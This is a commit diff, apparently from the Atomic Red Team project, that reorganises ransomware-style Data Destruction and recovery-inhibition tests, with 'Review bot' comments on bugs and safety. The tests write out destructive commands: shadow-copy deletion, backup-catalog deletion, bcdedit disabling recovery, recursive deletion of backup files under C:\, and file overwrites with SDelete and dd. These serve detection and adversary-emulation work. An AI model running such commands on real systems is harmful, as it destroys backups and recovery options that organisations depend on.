Generate docs from job=validate_atomics_generate_docs branch=master

This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-04-01 00:05:53 +00:00
parent 0725ce58d1
commit c4cd523a8d
7 changed files with 91 additions and 199 deletions
+20 -123
@@ -8,103 +8,16 @@ To maximize impact on the target organization in operations where network-wide a
## Atomic Tests
- [Atomic Test #1 - Windows - Delete Volume Shadow Copies](#atomic-test-1---windows---delete-volume-shadow-copies)
- [Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-1---windows---overwrite-file-with-sysinternals-sdelete)
- [Atomic Test #2 - Windows - Delete Windows Backup Catalog](#atomic-test-2---windows---delete-windows-backup-catalog)
- [Atomic Test #3 - Windows - Disable Windows Recovery Console Repair](#atomic-test-3---windows---disable-windows-recovery-console-repair)
- [Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete](#atomic-test-4---windows---overwrite-file-with-sysinternals-sdelete)
- [Atomic Test #5 - macOS/Linux - Overwrite file with DD](#atomic-test-5---macoslinux---overwrite-file-with-dd)
- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
- [Atomic Test #2 - macOS/Linux - Overwrite file with DD](#atomic-test-2---macoslinux---overwrite-file-with-dd)
<br/>
## Atomic Test #1 - Windows - Delete Volume Shadow Copies
Deletes Windows Volume Shadow Copies. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
vssadmin.exe delete shadows /all /quiet
```
<br/>
<br/>
## Atomic Test #2 - Windows - Delete Windows Backup Catalog
Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wbadmin.exe delete catalog -quiet
```
<br/>
<br/>
## Atomic Test #3 - Windows - Disable Windows Recovery Console Repair
Disables repair by the Windows Recovery Console on boot.
This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```
#### Cleanup Commands:
```cmd
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
bcdedit.exe /set {default} recoveryenabled yes
```
<br/>
<br/>
## Atomic Test #4 - Windows - Overwrite file with Sysinternals SDelete
Overwrites and deletes a file using Sysinternals SDelete.
Requires the download of either Sysinternals Suite or the individual SDelete utility.
## Atomic Test #1 - Windows - Overwrite file with Sysinternals SDelete
Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
the powershell session along with other information about the file that was deleted.
**Supported Platforms:** Windows
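Review bot: the four Windows tests dropped from this list (shadow copies, backup catalog, recovery console, backup files) reappear under the technique documented in the second changed file, but nothing in the remaining text of this file says so; a reader landing on the renumbered "Atomic Test #1" and "#2" has no pointer to where the recovery-inhibition tests went. Since this page is generated, the cross-reference belongs in the technique description in the source YAML so it survives the next regeneration.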
@@ -114,15 +27,15 @@ Requires the download of either Sysinternals Suite or the individual SDelete uti
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sdelete_exe | Path of sdelete executable | Path | PathToAtomicsFolder&#92;T1485&#92;bin&#92;sdelete.exe|
| sdelete_exe | Path of sdelete executable | Path | $env:TEMP&#92;Sdelete&#92;sdelete.exe|
| file_to_delete | Path of file to delete | path | $env:TEMP&#92;T1485.txt|
#### Attack Commands: Run with `powershell`!
```powershell
New-Item $env:TEMP\T1485.txt
#{sdelete_exe} -accepteula $env:TEMP\T1485.txt
Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
```
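Review bot: the new attack command `Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"` builds a command string from two input arguments and evaluates it, so any value containing a space (a path under a user profile, for example) breaks the invocation, and any value containing PowerShell metacharacters is executed rather than passed as an argument. The call operator avoids both problems: `& "#{sdelete_exe}" -accepteula "#{file_to_delete}"`. Separately, the inputs table types the two arguments as `Path` and `path`; the generator should be fed one spelling.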
@@ -132,14 +45,22 @@ New-Item $env:TEMP\T1485.txt
##### Description: Secure delete tool from Sysinternals must exist on disk at specified location (#{sdelete_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{sdelete_exe}) {0} else {1}
if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null
Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
Remove-Item $env:TEMP\SDelete.zip -Force
```
##### Description: The file to delete must exist at #{file_to_delete}
##### Check Prereq Commands:
```powershell
if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1 }
```
##### Get Prereq Commands:
```powershell
New-Item #{file_to_delete} -Force | Out-Null
```
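Review bot: the Get Prereq block fetches `SDelete.zip` over HTTPS and copies the binary into place with no integrity check, so the only assurance about what will later run elevated is the TLS connection; checking the extracted `sdelete.exe` with `Get-AuthenticodeSignature` (or against a pinned hash kept with the atomic) before the `Copy-Item` would close that gap. Also, with the new default `sdelete_exe` value of `$env:TEMP\Sdelete\sdelete.exe`, `Expand-Archive` already drops the file at exactly that path, so `Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}"` copies a file onto itself, which PowerShell refuses; the copy should be skipped when source and destination resolve to the same path. The `{0} else {1}` to `{exit 0} else {exit 1}` change in Check Prereq is the right fix, since only an exit code is observable to the runner.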
@@ -148,7 +69,7 @@ Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
<br/>
<br/>
## Atomic Test #5 - macOS/Linux - Overwrite file with DD
## Atomic Test #2 - macOS/Linux - Overwrite file with DD
Overwrites and deletes a file using DD.
To stop the test, break the command with CTRL/CMD+C.
@@ -176,28 +97,4 @@ dd of=#{file_to_overwrite} if=#{overwrite_source}
<br/>
<br/>
## Atomic Test #6 - Windows - Delete Backup Files
Deletes backup files in a manner similar to Ryuk ransomware.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
```
<br/>
+32
@@ -21,6 +21,8 @@ A number of native Windows utilities have been used by adversaries to disable or
- [Atomic Test #5 - Windows - Delete Volume Shadow Copies via WMI with PowerShell](#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell)
- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
<br/>
@@ -133,6 +135,11 @@ bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
```
#### Cleanup Commands:
```cmd
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
bcdedit.exe /set {default} recoveryenabled yes
```
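Review bot: the added cleanup writes fixed values (`bootstatuspolicy DisplayAllFailures`, `recoveryenabled yes`) rather than restoring whatever the boot entry held before the test, so on a host with a non-default policy the "cleanup" silently changes configuration a second time. Capturing the current values with `bcdedit /enum {default}` before the attack commands, or removing the element with `bcdedit /deletevalue {default} bootstatuspolicy` so the built-in default applies again, would make the cleanup faithful.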
@@ -165,4 +172,29 @@ Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
<br/>
<br/>
## Atomic Test #6 - Windows - Delete Backup Files
Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
to delete files from around the system.
**Supported Platforms:** Windows
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
```
<br/>
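Review bot: "Upon exection" in the description should read "Upon execution". More importantly, this test recursively deletes every `*.VHD`, `*.bak`, `*.wbcat`, `Backup*.*` and similar file under `C:\` with `/f /q`, has no Cleanup Commands section, and its deletions are not reversible; the description should state plainly that it destroys real backup data and must only be run on a disposable test host. Dropping the old `>nul 2>&1` is what surfaces the "access is denied" messages the description now mentions, which is useful feedback, so that part is fine.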
+3 -6
@@ -493,12 +493,8 @@
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- [T1485 Data Destruction](./T1485/T1485.md)
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -511,6 +507,7 @@
- Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](./T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
+32 -63
@@ -15971,73 +15971,39 @@ impact:
modified: '2019-07-19T14:34:28.595Z'
identifier: T1485
atomic_tests:
- name: Windows - Delete Volume Shadow Copies
description: 'Deletes Windows Volume Shadow Copies. This technique is used by
numerous ransomware families and APT malware such as Olympic Destroyer.
'
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: 'vssadmin.exe delete shadows /all /quiet
'
- name: Windows - Delete Windows Backup Catalog
description: 'Deletes Windows Backup Catalog. This technique is used by numerous
ransomware families and APT malware such as Olympic Destroyer.
'
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: 'wbadmin.exe delete catalog -quiet
'
- name: Windows - Disable Windows Recovery Console Repair
description: |
Disables repair by the Windows Recovery Console on boot.
This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer.
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
cleanup_command: |
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
bcdedit.exe /set {default} recoveryenabled yes
- name: Windows - Overwrite file with Sysinternals SDelete
description: |
Overwrites and deletes a file using Sysinternals SDelete.
Requires the download of either Sysinternals Suite or the individual SDelete utility.
Overwrites and deletes a file using Sysinternals SDelete. Upon successful execution, "Files deleted: 1" will be displayed in
the powershell session along with other information about the file that was deleted.
supported_platforms:
- windows
input_arguments:
sdelete_exe:
description: Path of sdelete executable
type: Path
default: PathToAtomicsFolder\T1485\bin\sdelete.exe
default: "$env:TEMP\\Sdelete\\sdelete.exe"
file_to_delete:
description: Path of file to delete
type: path
default: "$env:TEMP\\T1485.txt"
dependency_executor_name: powershell
dependencies:
- description: Secure delete tool from Sysinternals must exist on disk at specified
location (#{sdelete_exe})
prereq_command: 'if (Test-Path #{sdelete_exe}) {0} else {1}'
prereq_command: 'if (Test-Path #{sdelete_exe}) {exit 0} else {exit 1}'
get_prereq_command: |-
Invoke-WebRequest "https://download.sysinternals.com/files/SDelete.zip" -OutFile "$env:TEMP\SDelete.zip"
Expand-Archive $env:TEMP\SDelete.zip $env:TEMP\Sdelete -Force
New-Item -ItemType Directory (Split-Path "#{sdelete_exe}") -Force | Out-Null
Copy-Item $env:TEMP\Sdelete\sdelete.exe "#{sdelete_exe}" -Force
Remove-Item $env:TEMP\SDelete.zip -Force
- description: 'The file to delete must exist at #{file_to_delete}'
prereq_command: 'if (Test-Path #{file_to_delete}) { exit 0 } else { exit 1
}'
get_prereq_command: 'New-Item #{file_to_delete} -Force | Out-Null'
executor:
name: powershell
command: |
New-Item $env:TEMP\T1485.txt
#{sdelete_exe} -accepteula $env:TEMP\T1485.txt
command: 'Invoke-Expression -Command "#{sdelete_exe} -accepteula #{file_to_delete}"
'
- name: macOS/Linux - Overwrite file with DD
description: |
Overwrites and deletes a file using DD.
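Review bot: the technique's `modified: '2019-07-19T14:34:28.595Z'` in the context at the top of this hunk is unchanged even though four atomic tests are removed and the SDelete test gets new input arguments, dependencies and a different command; if consumers of the index use `modified` to decide what to re-import, they will miss this change. The generator (or the source atomic file it reads) should bump the timestamp when test content changes.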
@@ -16058,19 +16024,6 @@ impact:
name: bash
command: 'dd of=#{file_to_overwrite} if=#{overwrite_source}
'
- name: Windows - Delete Backup Files
description: 'Deletes backup files in a manner similar to Ryuk ransomware.
'
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
c:\backup*.* c:\*.set c:\*.win c:\*.dsk >nul 2>&1
'
'':
technique:
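Review bot: the trailing context shows `'':` followed by `technique:`, i.e. a technique entry keyed on the empty string immediately after the T1485 tests; that looks like a generator artifact (an atomic file with a blank or missing identifier) rather than intended content, and it is worth tracking down in the source before this index is consumed by tooling that keys on technique ids.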
@@ -16250,6 +16203,9 @@ impact:
command: |
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
bcdedit.exe /set {default} recoveryenabled no
cleanup_command: |
bcdedit.exe /set {default} bootstatuspolicy DisplayAllFailures
bcdedit.exe /set {default} recoveryenabled yes
- name: Windows - Delete Volume Shadow Copies via WMI with PowerShell
description: |
Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject.
@@ -16263,6 +16219,19 @@ impact:
elevation_required: true
command: 'Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
'
- name: Windows - Delete Backup Files
description: |
Deletes backup files in a manner similar to Ryuk ransomware. Upon exection, many "access is denied" messages will appear as the commands try
to delete files from around the system.
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
c:\backup*.* c:\*.set c:\*.win c:\*.dsk
'
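Review bot: same "Upon exection" typo as in the Markdown rendering of this test; since the docs are generated from this YAML, which is in turn generated from the atomic file, the fix needs to land in the source atomic so both outputs are corrected on the next run.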
T1496:
technique:
+1 -1
@@ -39,7 +39,7 @@
# impact
- [T1531 Account Access Removal](./T1531/T1531.md)
- [T1485 Data Destruction](./T1485/T1485.md)
- Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos]
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+1 -1
@@ -56,7 +56,7 @@
# impact
- [T1531 Account Access Removal](./T1531/T1531.md)
- [T1485 Data Destruction](./T1485/T1485.md)
- Atomic Test #5: macOS/Linux - Overwrite file with DD [linux, macos]
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+2 -5
@@ -356,11 +356,7 @@
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- [T1485 Data Destruction](./T1485/T1485.md)
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -373,6 +369,7 @@
- Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](./T1496/T1496.md)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)